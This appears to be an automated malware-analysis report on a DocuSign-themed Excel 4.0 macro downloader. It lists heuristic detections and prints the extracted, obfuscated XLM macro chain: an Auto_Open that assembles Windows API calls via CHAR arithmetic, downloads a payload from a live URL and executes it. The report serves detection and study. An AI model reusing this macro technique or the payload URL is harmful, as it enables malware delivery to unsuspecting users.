MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros with an Auto_Open entry, which is a critical finding. These macros utilize dangerous functions like RUN and CALL, and are designed to execute code from the embedded URL 'https://jpsteel.in/ds/261120.gif'. The script attempts to construct and execute commands, indicating a downloader functionality. The presence of ShellExecute API calls further supports the execution of external code.
Heuristics 7
-
ClamAV: Doc.Downloader.Docusign0521-9864805-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
URL reconstructed from XLM cell array (1 URL) critical OLE_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://jpsteel.in/ds/261120.gif Referenced by macro
- https://jpsteel.in/ds/261120.gif�Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt0d33d3f7accc92fdd60dbf912082de478929da664f047bbfbed4791982921d46 |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6676 bytes |
Preview scriptFirst 1,000 lines of the extracted script
' 0085 16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - DocuSig
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - File
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Files
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Files
' 0085 15 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - rtutrd
' 0085 12 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ete
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d File!A40
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' File,A51,RUN(R59),""
' File,R59,RUN( File!M98),""
' File,M89,CONCATENATE("Ke"& DocuSig!BY80&"l32"),""
' File,M90,CONCATENATE("Cr"& DocuSig!BY92&"yA"),""
' File,M91,"JCJ",""
' File,M92, DocuSig!BN62,""
' File,M94, DocuSig!BN62& DocuSig!BN77,""
' File,M98,"CALL(""&""&""&""&""&""&""&""&""&M89,M90,M91,M92,0)",""
' File,M99,RUN(M105),""
' File,M105,"CALL(M89,M90,M91,M94,0)",""
' File,M106,RUN( rtutrd!A70),""
' Files,A59,EXEC( Files!W36& DocuSig!BN62& DocuSig!BN77& DocuSig!BN91),""
' Files,A60,HALT(),""
' Files,A70,RUN( Files!D67),""
' Files,D67,"CALL("UR"& DocuSig!BY111&"n","UR"& DocuSig!BY120&"e"&"A","IICCII",0, DocuSig!FE100, DocuSig!BN62& DocuSig!BN77& DocuSig!BN91,0,0)",""
' Files,D68,RUN( rtutrd!A59),""
' rtutrd,BN62,"CONCATENATE(BN63,BN64,BN65,BN66,BN67,BN68,BN69,BN70,BN71)",""
' rtutrd,BN63,CHAR(BO63+BP63+BQ63),""
' rtutrd,BN64,CHAR(BO64+BP64+BQ64),""
' rtutrd,BN65,CHAR(BO65+BP65+BQ65),""
' rtutrd,BN66,CHAR(BO66+BP66-BQ66),""
' rtutrd,BN67,CHAR(BO67+BP67-BQ67),""
' rtutrd,BN68,CHAR(BO68+BP68-BQ68),""
' rtutrd,BN69,CHAR(BO69-BP69+BQ69),""
' rtutrd,BN70,CHAR(BO70-BP70+BQ70),""
' rtutrd,BN71,CHAR(BO71-BP71+BQ71),""
' rtutrd,BN77,"CONCATENATE(BN78,BN79,BN80,BN81,BN82,BN83,BN84)",""
' rtutrd,BN78,CHAR(BO78-BP78-BQ78),""
' rtutrd,BN79,CHAR(BO79-BP79-BQ79),""
' rtutrd,BN80,CHAR(BO80-BP80-BQ80),""
' rtutrd,BY80,CONCATENATE(BY83&BY84&BY85),""
' rtutrd,BN81,CHAR(BO81-BP81+BQ81),""
' rtutrd,BY81,CHAR(BZ81+CA81+CB81),""
' rtutrd,BN82,CHAR(BO82-BP82+BQ82),""
' rtutrd,BY82,CHAR(BZ82+CA82+CB82),""
' rtutrd,BN83,CHAR(BO83-BP83+BQ83),""
' rtutrd,BY83,CHAR(BZ83+CA83+CB83),""
' rtutrd,BN84,CHAR(BO84-BP84+BQ84),""
' rtutrd,BY84,CHAR(BZ84+CA84+CB84),""
' rtutrd,BY85,CHAR(BZ85-CA85-CB85),""
' rtutrd,BY86,CHAR(BZ86-CA86-CB86),""
' rtutrd,BY87,CHAR(BZ87-CA87+CB87),""
' rtutrd,BY88,CHAR(BZ88-CA88+CB88),""
' rtutrd,BN91,"CONCATENATE(BN92,BN93,BN94,BN95,BN96,BN97,BN98,BN99,BN100,BN101,BN102,BN103,BN104)",""
' rtutrd,BN92,[],""
' rtutrd,BY92,"CONCATENATE(BY95,BY96, Files!BC60, Files!BC61&"D"& DocuSig!BY97, DocuSig!BY98, DocuSig!BY99, DocuSig!BY100, DocuSig!BY101, DocuSig!BY102, DocuSig!BY103)",""
' rtutrd,BN93,[],""
' rtutrd,BY93,CHAR(BZ93+CA93+CB93),""
' rtutrd,BN94,[],""
' rtutrd,BS94,CONCATENATE(BS95&BS96&BS97&BS98),""
' rtutrd,BY94,CHAR(BZ94+CA94+CB94),""
' rtutrd,BN95,[],""
' rtutrd,BS95,CHAR(BT95+BU95-BV95),""
' rtutrd,BY95,CHAR(101),""
' rtutrd,BN96,[],""
' rtutrd,BS96,CHAR(BT96+BU96-BV96),""
' rtutrd,BY96,CHAR(BZ96+CA96+CB96),""
' rtutrd,BN97,[],""
' rtutrd,BS97,CHAR(BT97-BU97+BV97),""
' rtutrd,BY97,CHAR(BZ97-CA97-CB97),""
' rtutrd,BN98,[],""
' rtutrd,BS98,CHAR(BT98-BU98+BV98),""
' rtutrd,BY98,CHAR(BZ98+CA98-CB98),""
' rtutrd,BN99,[],""
' rtutrd,BY99,CHAR(BZ99+CA99-CB99),""
' rtutrd,BN100,[],""
' rtutrd,BY100,CHAR(99),""
' rtutrd,FE100,"https://jpsteel.in/ds/261120.gif",""
' rtutrd,BN101,[],""
' rtutrd,BY101,CHAR(BZ101+CA101-CB101),""
' rtutrd,BN102,[],""
' rtutrd,BY102,CHAR(BZ102-CA102+CB102),""
' rtutrd,BN103,[],""
' rtutrd,BY103,CHAR(BZ103-CA103+CB103),""
' rtutrd,BN104,[],""
' rtutrd,BY111,"CONCATENATE(BY114,BY115,BY116)",""
' rtutrd,BY112,CHAR(BZ112+CA112+CB112),""
' rtutrd,BY113,CHAR(BZ113+CA113+CB113),""
' rtutrd,BY114,CHAR(BZ114+CA114+CB114),""
' rtutrd,BY115,CHAR(BZ115-CA115-CB115),""
' rtutrd,BY116,CHAR(BZ116-CA116-CB116),""
' rtutrd,BY117,CHAR(BZ117-CA117-CB117),""
' rtutrd,BY120,"CONCATENATE(BY123,BY124,BY125,BY126,BY127,BY128,BY129,BY130,BY131,BY132,BY133,BY134,BY135,BY136)",""
' rtutrd,BY121,"CHAR(SUM(BZ121,CA121,CB121))",""
' rtutrd,BY122,"CHAR(SUM(BZ122,CA122,CB122))",""
' rtutrd,BY123,"CHAR(SUM(BZ123,CA123,CB123))",""
' rtutrd,BY124,CHAR(BZ124-CA124-CB124),""
' rtutrd,BY125,CHAR(BZ125-CA125-CB125),""
' rtutrd,BR126,CONCATENATE(BR127&BR128&BR129&BR130&BR131&BR132&BR133),""
' rtutrd,BY126,CHAR(BZ126-CA126-CB126),""
' rtutrd,BR127,CHAR(BS127+BT127+BU127),""
' rtutrd,BY127,CHAR(BZ127+CA127-CB127),""
' rtutrd,BR128,CHAR(BS128+BT128+BU128),""
' rtutrd,BY128,CHAR(BZ128+CA128-CB128),""
' rtutrd,BR129,CHAR(BS129+BT129+BU129),""
' rtutrd,BY129,CHAR(BZ129+CA129-CB129),""
' rtutrd,BR130,CHAR(BS130+BT130+BU130),""
' rtutrd,BY130,CHAR(BZ130-CA130+CB130),""
' rtutrd,BR131,CHAR(BS131-BT131-BU131),""
' rtutrd,BY131,CHAR(BZ131-CA131+CB131),""
' rtutrd,BR132,CHAR(BS132-BT132-BU132),""
' rtutrd,BY132,CHAR(BZ132-CA132+CB132),""
' rtutrd,BR133,CHAR(BS133-BT133-BU133),""
' rtutrd,BY133,"CHAR(SUM(BZ133,CA133,CB133))",""
' rtutrd,BY134,"CHAR(SUM(BZ134,CA134,CB134))",""
' rtutrd,BY135,"CHAR(SUM(BZ135,CA135,CB135))",""
' rtutrd,BY136,CHAR(BZ136-CA136-CB136),""
' rtutrd,BY137,CHAR(BZ137-CA137-CB137),""
' rtutrd,BY138,CHAR(BZ138-CA138-CB138),""
' ete,W36,"CONCATENATE(W37,W38,W39,W40,W41,W42,W43,W44,W45,W46,W47,W48)",""
' ete,W37,[],""
' ete,W38,[],""
' ete,W39,[],""
' ete,W40,[],""
' ete,W41,[],""
' ete,W42,[],""
' ete,W43,[],""
' ete,W44,[],""
' ete,W45,[],""
' ete,W46,[],""
' ete,W47,[],""
' ete,W48,[],""
' ete,BC60,CHAR(BD60-BE60-BF60),""
' ete,BC61,CHAR(BD61-BE61-BF61),""
' ete,N62,"CONCATENATE("S"&N64,N65,N66,N67,N68&S76)",""
' ete,BC62,CHAR(BD62-BE62-BF62),""
' ete,N63,CHAR(O63+P63+Q63),""
' ete,N64,CHAR(O64+P64+Q64),""
' ete,N65,CHAR(O65+P65+Q65),""
' ete,N66,CHAR(O66-P66-Q66),""
' ete,N67,CHAR(O67-P67-Q67),""
' ete,N68,CHAR(O68-P68-Q68),""
' ete,S76,"CONCATENATE(S77,S78,S79,S80,S81,S82&"A")",""
' ete,S77,CHAR(T77-U77-V77),""
' ete,S78,CHAR(T78-U78+V78),""
' ete,S79,CHAR(T79-U79+V79),""
' ete,S80,CHAR(T80-U80+V80),""
' ete,S81,CHAR(T81+U81-V81),""
' ete,S82,CHAR(T82+U82-V82),""
' ete,S83,CHAR(T83+U83-V83),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.